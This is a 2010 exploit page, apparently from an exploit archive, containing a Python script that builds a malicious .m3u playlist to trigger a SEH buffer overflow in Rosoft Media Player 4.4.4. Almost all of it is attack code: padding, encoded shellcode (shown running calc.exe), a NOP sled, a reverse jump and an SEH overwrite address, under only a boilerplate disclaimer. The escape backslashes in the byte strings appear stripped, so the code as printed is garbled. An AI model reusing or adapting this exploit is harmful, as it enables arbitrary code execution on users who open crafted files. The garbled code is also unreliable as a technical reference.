Rosoft media player 4.4.4 SEH Buffer Overflow
Posted on 15 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Rosoft media player 4.4.4 SEH Buffer Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================= Rosoft media player 4.4.4 SEH Buffer Overflow ============================================= #!/usr/bin/python # ####################################################################### # Title: Rosoft media player 4.4.4 SEH buffer overflow # Date: August 15, 2010 # Author: dijital1 # Original Advisory: http://www.exploit-db.com/exploits/14601 - abhishek lyall # Download: http://www.exploit-db.com/application/14601/ # Platform: Windows XP SP3 EN Professional - VMware # Greetz to: Corelan Security Team, exploit-db # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # ####################################################################### # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "| http://www.corelan.be:8800 |" print "| security@corelan.be |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print " -= Exploit for Rosoft media player 4.4.4 (SEH) - dijital1 =- " outputfile="exploit.m3u" junk="x41"*3470 nseh="xebx88x90x90" #reverse jump 118 bytes seh="x49xd4x46x00" # PPR - 0046D449 - Taken from the exe. Not a string copy so # the null byte works. # The following shellcode places EIP in ECX and manually adjusts it # to move execution 775 bytes earlier in the buffer. We need to # to jump back further than what a short jump will allow hence the following... # # Referenced: phrack #62 Article 7 Originally written by Aaron Adams # # msfencode -i ./768bck.bin -e x86/alpha_upper -t c # [*] x86/alpha_upper succeeded with size 107 (iteration=1) revjump=("x89xe7xdbxd7xd9x77xf4x5ex56x59x49x49x49x49x43" "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" "x50x38x41x43x4ax4ax49x4ex39x4ax4ex49x49x43x44" "x51x34x4cx34x50x59x4bx30x4fx31x44x4ax4ax30x4b" "x4ex48x4dx4bx4ex48x4dx4bx4ex48x4dx4bx4fx4dx31" "x41x41") # NOP sled between the main payload and the reverse jump shellcode sled="x90"*60 # msfpayload windows/exec CMD=calc.exe R | ./msfencode -e x86/alpha_upper -t c # [*] x86/alpha_upper succeeded with size 471 (iteration=1) shellcode=("x89xe5xdbxc5xd9x75xf4x58x50x59x49x49x49x49x43" "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" "x50x38x41x43x4ax4ax49x4bx4cx4bx58x4bx39x45x50" "x45x50x45x50x43x50x4dx59x4bx55x46x51x49x42x45" "x34x4cx4bx51x42x46x50x4cx4bx50x52x44x4cx4cx4b" "x50x52x42x34x4cx4bx43x42x47x58x44x4fx4fx47x50" "x4ax47x56x46x51x4bx4fx50x31x4fx30x4ex4cx47x4c" "x43x51x43x4cx45x52x46x4cx47x50x4fx31x48x4fx44" "x4dx45x51x4fx37x4bx52x4ax50x51x42x50x57x4cx4b" "x51x42x44x50x4cx4bx51x52x47x4cx43x31x4ex30x4c" "x4bx51x50x42x58x4dx55x4fx30x42x54x50x4ax43x31" "x48x50x50x50x4cx4bx47x38x42x38x4cx4bx51x48x47" "x50x43x31x4ex33x4ax43x47x4cx50x49x4cx4bx50x34" "x4cx4bx43x31x48x56x50x31x4bx4fx46x51x49x50x4e" "x4cx4fx31x48x4fx44x4dx43x31x4fx37x46x58x4bx50" "x43x45x4ax54x44x43x43x4dx4bx48x47x4bx43x4dx47" "x54x42x55x4dx32x50x58x4cx4bx51x48x51x34x43x31" "x49x43x45x36x4cx4bx44x4cx50x4bx4cx4bx51x48x45" "x4cx45x51x48x53x4cx4bx45x54x4cx4bx45x51x48x50" "x4cx49x50x44x47x54x47x54x51x4bx51x4bx45x31x46" "x39x51x4ax50x51x4bx4fx4bx50x50x58x51x4fx50x5a" "x4cx4bx42x32x4ax4bx4dx56x51x4dx43x5ax43x31x4c" "x4dx4cx45x48x39x45x50x45x50x45x50x46x30x42x48" "x50x31x4cx4bx42x4fx4bx37x4bx4fx49x45x4fx4bx4a" "x50x48x35x4fx52x46x36x45x38x49x36x4ax35x4fx4d" "x4dx4dx4bx4fx4ex35x47x4cx45x56x43x4cx44x4ax4d" "x50x4bx4bx4bx50x42x55x44x45x4fx4bx47x37x44x53" "x44x32x42x4fx42x4ax43x30x46x33x4bx4fx49x45x45" "x33x45x31x42x4cx42x43x46x4ex42x45x44x38x43x55" "x45x50x45x5ax41x41") payload=junk+shellcode+sled+revjump+nseh+seh FILE = open(outputfile, "w") FILE.write(payload) FILE.close() print " Exploit written to: " + outputfile + " " # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-15]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
